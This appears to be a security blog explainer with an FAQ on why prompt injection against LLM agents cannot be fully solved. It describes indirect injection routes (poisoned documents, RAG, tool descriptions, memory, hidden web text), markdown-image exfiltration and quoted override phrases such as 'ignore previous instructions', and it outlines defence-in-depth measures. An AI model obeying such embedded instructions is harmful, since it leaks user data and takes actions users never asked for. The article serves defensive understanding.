What attack success rate has Anthropic achieved against prompt injection?

Claude Opus 4.5 achieved a 1% attack success rate under adversarial testing, representing the current state of the art. However, Anthropic frames this as 'meaningful risk' rather than a solved problem. At scale, 1% means 100 successful injections per 10,000 documents processed.

Why can't prompt injection be fixed like SQL injection was?

SQL injection was solved because SQL has a formal grammar that lets databases deterministically separate code from data through parameterized queries. Natural language has no such grammar. LLMs process everything in a shared context window where instructions and data are both just tokens, making it impossible to reliably distinguish malicious embedded commands from legitimate requests.

What is indirect prompt injection?

Indirect prompt injection embeds malicious instructions in content the model retrieves or processes, rather than having users type attacks directly. This includes poisoned documents, emails, web pages, tool outputs, or RAG results. It's more dangerous than direct injection because the user never types anything malicious and may not know they triggered an attack.

Prompt Injection: Why It Can't Be Fixed

Prompt injection is not a bug. It's a consequence of how large language models work, and every major AI lab has admitted (some more quietly than others) that no complete fix exists.

This isn't theoretical. 73% of production AI deployments are vulnerable according to OWASP's 2025 assessments. OpenAI's own red team discovered attacks where a malicious email could make their browser agent send a resignation letter instead of an out-of-office reply. Anthropic, despite achieving industry-leading defenses with Claude Opus 4.5, explicitly states that no browser agent is immune. If you're building agentic systems, this is the security reality you're operating in.

SQL Injection This Is Not

When developers first hear "prompt injection," they reach for familiar patterns. Sanitize the input. Escape special characters. Build a WAF-style blocklist.

None of that works here. SQL injection is solvable because SQL has a formal grammar. You can deterministically separate code from data using parameterized queries. The database knows the difference between SELECT * FROM users and Robert'; DROP TABLE users;-- because the syntax is unambiguous.

Natural language has no such grammar.

An LLM processes everything in a shared context window where instructions and data are both just tokens. The model cannot reliably distinguish "ignore previous instructions" embedded in a document from a legitimate user request, because linguistically, they're identical. You cannot sanitize natural language input without breaking the functionality that makes LLMs useful in the first place. The very capability that lets Claude understand nuanced requests also makes it susceptible to nuanced attacks.

Where the Real Attacks Happen

Direct prompt injection is what most people picture: a user typing "ignore your system prompt" into a chatbot. This is the attack you see in demos and security conference talks. It's also the least dangerous variant in production. You control the input channel. You can rate-limit users, log suspicious patterns, and deploy classifiers. The user knows they're attacking you.

Indirect injection is the production threat worth losing sleep over.

Here, malicious instructions are embedded in content the model retrieves or processes: documents, emails, web pages, tool outputs, or RAG results. Lakera documented an incident where invisible text in a Reddit post caused Perplexity's Comet agent to leak a user's one-time password. The user never typed anything malicious. They asked a question; the model retrieved a poisoned answer; the attack executed.

The attack surfaces multiply in agentic systems:

RAG poisoning: A January 2025 breach saw proprietary business intelligence exfiltrated after attackers injected prompts into indexed documents
MCP tool descriptions: Tool definitions themselves can contain injected instructions
Memory persistence: Poisoned entries can influence agent behavior across multiple sessions
Email and document injection: Any file an agent processes becomes an attack vector

Our read: the security perimeter is no longer the model. It's every system the model touches.

Anthropic's prompt injection research represents the current state of the art. Their approach combines three layers: model training via reinforcement learning to resist injection, content classification to detect embedded commands, and continuous human red teaming to find novel attacks. The result? Claude Opus 4.5 achieved a 1% attack success rate under adversarial testing. That's a significant improvement over earlier models, but Anthropic frames it as "meaningful risk," not a solved problem.

Think about what 1% means at scale. If your agent processes 10,000 documents per day, 100 could contain successful injections.

If you're building a customer-facing product with millions of interactions, 1% is not a rounding error. OpenAI reached the same conclusion through different methods. After discovering multi-step injection attacks during internal red teaming, they deployed adversarially trained models with "counterfactual rollout" testing and still describe the problem as requiring continuous rather than one-time defenses. Meaningful progress is happening. Declaring victory would be premature and dangerous.

Managing What You Can't Solve

If you cannot solve prompt injection, you can still manage it. The approach that emerges from Microsoft, Anthropic, and OpenAI's research is defense-in-depth: multiple overlapping controls that limit both the probability and impact of successful attacks.

Microsoft's "spotlighting" technique uses delimiting, datamarking, and encoding to separate trusted instructions from untrusted data. The model sees clear boundaries between "this is what you should do" and "this is content you're processing." This reduces attack surface but doesn't eliminate it; sophisticated injections can mimic delimiters or exploit edge cases in encoding. Both Anthropic and Microsoft deploy classifiers that scan for patterns suggesting embedded instructions. Microsoft's Prompt Shields integrate with Defender for Cloud; Anthropic runs content classification as a preprocessing layer. These catch known attack patterns but struggle with novel techniques. They're a necessary layer, not a sufficient one.

Some exfiltration techniques can be blocked deterministically. Microsoft specifically addresses markdown image injection, where an attacker embeds a tracking URL in generated markdown, by filtering specific patterns regardless of what the model outputs. This is the rare case where you can apply traditional security thinking: identify a specific attack class and block it at the output layer.

Your agent doesn't need access to everything.

Every tool, every API endpoint, every data source expands the blast radius of a successful injection. The principle is familiar from traditional security: grant the minimum permissions necessary. If your agent only reads email, it cannot send resignation letters. If it cannot execute code, CVE-style escalations are off the table. The Lakera research notes that CVE-2025-59944 (a case sensitivity bug) escalated to remote code execution precisely because the affected system had broad tool access.

For sensitive actions, there is no substitute for human approval. Microsoft explicitly recommends human-in-the-loop workflows for anything with significant consequences. This breaks the "fully autonomous agent" dream but reflects reality. If the action is reversible and low-stakes, let the agent proceed. If it's sending money, deleting data, or communicating externally on someone's behalf, require approval.

Developers deploying agents today face a choice: acknowledge this risk and architect around it, or ignore it and hope. The teams taking it seriously are running threat models that include prompt injection across all input surfaces. They're deploying classifiers and monitoring for suspicious patterns. They're limiting agent capabilities to what's actually needed, requiring human approval for consequential actions, and treating their RAG corpus and tool descriptions as attack surfaces.

The teams not taking it seriously are contributing to that 73% vulnerability statistic.

The bottom line: This is a manageable risk. Defense-in-depth works. Not perfectly, but meaningfully. Assuming your model provider has solved the problem doesn't work, because they haven't. Anthropic, OpenAI, and Microsoft are all telling you the same thing: continuous vigilance, layered defenses, and honest acceptance that some residual risk will remain. Build accordingly.

Sources cited: Claims as analysis: